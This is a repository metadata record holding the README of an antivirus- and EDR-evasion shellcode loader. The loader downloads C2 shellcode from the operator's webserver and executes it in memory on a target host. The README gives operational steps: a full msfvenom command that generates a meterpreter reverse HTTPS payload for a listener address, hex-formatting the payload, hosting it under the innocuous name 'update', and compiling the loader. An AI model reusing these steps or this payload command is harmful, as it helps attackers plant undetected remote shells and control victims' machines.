{"id":21278264,"url":"https://github.com/virtualalllocex/create-thread-shellcode-fetcher","last_synced_at":"2025-04-09T22:18:19.201Z","repository":{"id":45906356,"uuid":"474570591","full_name":"VirtualAlllocEx/Create-Thread-Shellcode-Fetcher","owner":"VirtualAlllocEx","description":"This POC gives you the possibility to compile a .exe to completely avoid statically detection by AV/EPP/EDR of your C2-shellcode and download and execute your C2-shellcode which is hosted on your (C2)-webserver.","archived":false,"fork":false,"pushed_at":"2023-05-25T02:48:55.000Z","size":2837,"stargazers_count":246,"open_issues_count":1,"forks_count":51,"subscribers_count":9,"default_branch":"main","last_synced_at":"2025-04-09T22:18:15.441Z","etag":null,"topics":["antivirus-evasion","bypass-antivirus","edr-bypass","msfvenom","shellcode-injection","shellcode-loader"],"latest_commit_sha":null,"homepage":"","language":"C++","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/VirtualAlllocEx.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null}},"created_at":"2022-03-27T07:51:08.000Z","updated_at":"2025-02-16T23:12:12.000Z","dependencies_parsed_at":"2023-11-13T15:17:51.377Z","dependency_job_id":null,"html_url":"https://github.com/VirtualAlllocEx/Create-Thread-Shellcode-Fetcher","commit_stats":null,"previous_names":["virtualalllocex/shellcode-downloader-createthread-execution"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/VirtualAlllocEx%2FCreate-Thread-Shellcode-Fetcher","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/VirtualAlllocEx%2FCreate-Thread-Shellcode-Fetcher/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/VirtualAlllocEx%2FCreate-Thread-Shellcode-Fetcher/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/VirtualAlllocEx%2FCreate-Thread-Shellcode-Fetcher/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/VirtualAlllocEx","download_url":"https://codeload.github.com/VirtualAlllocEx/Create-Thread-Shellcode-Fetcher/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":248119286,"owners_count":21050755,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["antivirus-evasion","bypass-antivirus","edr-bypass","msfvenom","shellcode-injection","shellcode-loader"],"created_at":"2024-11-21T10:11:05.879Z","updated_at":"2025-04-09T22:18:19.182Z","avatar_url":"https://github.com/VirtualAlllocEx.png","language":"C++","readme":"# Create-Thread-Shellcode-Fetcher\nAlso if you use for example **syscalls (nativ APIs)** to execute C2-shellcode with a .exe, you often have the problem, that \nyour **compiled .exe** gets **statically flagged by the AV/EPP/EDR**. Many times the reason for this is, that the **C2-shellcode** \nhas to be directly **included as string or as a .bin ressource** in the c++ POC and by that the well known C2-shellcode \n(e.g. Metasploit-, CobaltStrike-, Empire Shellcode etc.) is statically flagged by the AV/EPP/EDR. \nThis means, no matter which clever technique you would use to bypass prevention/detection in context of API-Hooking, Kernel Callback Function etc. \nyour .exe POC will get flagged before you can ever execute it. Also if you want to **compile a c++ POC** in Visual Studio it isn't possible to **include stageless shellcode** in a char string, because the string is **limited in length** (always stay stageless if possible 😉). \n\nFrom my experience, depending on the AV/EPP/EDR it isn't often the most important thing to only care about how to bypass the dynamically prevention/detection of an AV/EPP/EDR. At least equally important is to care about how could I bypass the statically prevetion/detection, to maybe break the chain of a maybe following connected dynamicall or in-memory prevention/detection. \n\n**This POC gives you the possibility to compile a .exe to completely avoid statically detection by AV/EPP/EDR of your C2-shellcode and download and execute your C2-shellcode which is hosted on your (C2)-webserver.**\n\n![image](https://user-images.githubusercontent.com/50073731/160274700-173f342f-1fd8-4080-8e78-d832129a99c6.png)\n\nBy that POC we have the advantage, that the shellcode for the C2 reverse shell isn't included as string or as .bin file in the POC.\nTrough that, we don't have the problem of statically detection of the C2 shellcode by an AV/EPP/EDR, because the complete C2-shellcode is hosted \non a webserver. \n\n\n\n**1. Creating stageless shellcode with MSF-Venom**\n\n**kali\u003e** msfvenom -p windows/x64/meterpreter_reverse_https LHOST=10.10.0.1 LPORT=443 -f c --arch x64 --platform windows -o /tmp/meterx64.c\n\n![image](https://user-images.githubusercontent.com/50073731/160274011-82fd0f13-a52c-4f90-93bd-01d39a9872d9.png)\n\n\n\n**2. Hosting file with MSF-stageless shellcode on webserver**\n\nBased on the code in the c++ POC the hosted shellcode must be in HEX-Format. To bring the whole MSF-shellcode in one line, you can use the\nthe line operation function in Notpad++ join lines and then remove not spaces and the double quotes in the string. Only at the beginning and the end\nwe need from the HEX-shellcode string we need double quotes.\n\n![image](https://user-images.githubusercontent.com/50073731/160274172-4a793332-db0d-465f-b6e9-aa3cf024c8a3.png)\n\n![image](https://user-images.githubusercontent.com/50073731/160843980-56d60e17-de71-4505-a847-4fa1d3f51032.png)\n\n![image](https://user-images.githubusercontent.com/50073731/160844266-8a9b2e0c-1bcb-4122-97aa-6eca529e9d46.png)\n\nAt the end you can save the file with the stageless MSF-shellcode as a file without any filetype ending, we call it for example **update** and then upload the MSF-Shellcode File on your webserver of choice. \n\n**3. Change the link in the c++ POC to your MSF-payload**\nIn this step we change the link in the POC to the link of the webserver on which we have hosted our stageless MSF-Shellcode and compile\nit in **Visual Studio as Release x64**.\n\n![image](https://user-images.githubusercontent.com/50073731/160274705-7c608ab1-1137-4f0f-8152-8a722de6a270.png)\n\n**After compiling with VS you have a x64 Binary, which do not contain any C2-shellcode string or .bin file at all. After execution \nthe C2-shellcode is downloaded and executed in the memory of the targeted host.** \nAt the moment the execution of the shellcode by using Create Thread is done with WIN32 APIs.\nBut despite not using syscalls, the POC will do a nice job 😉.\n","funding_links":[],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fvirtualalllocex%2Fcreate-thread-shellcode-fetcher","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fvirtualalllocex%2Fcreate-thread-shellcode-fetcher","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fvirtualalllocex%2Fcreate-thread-shellcode-fetcher/lists"}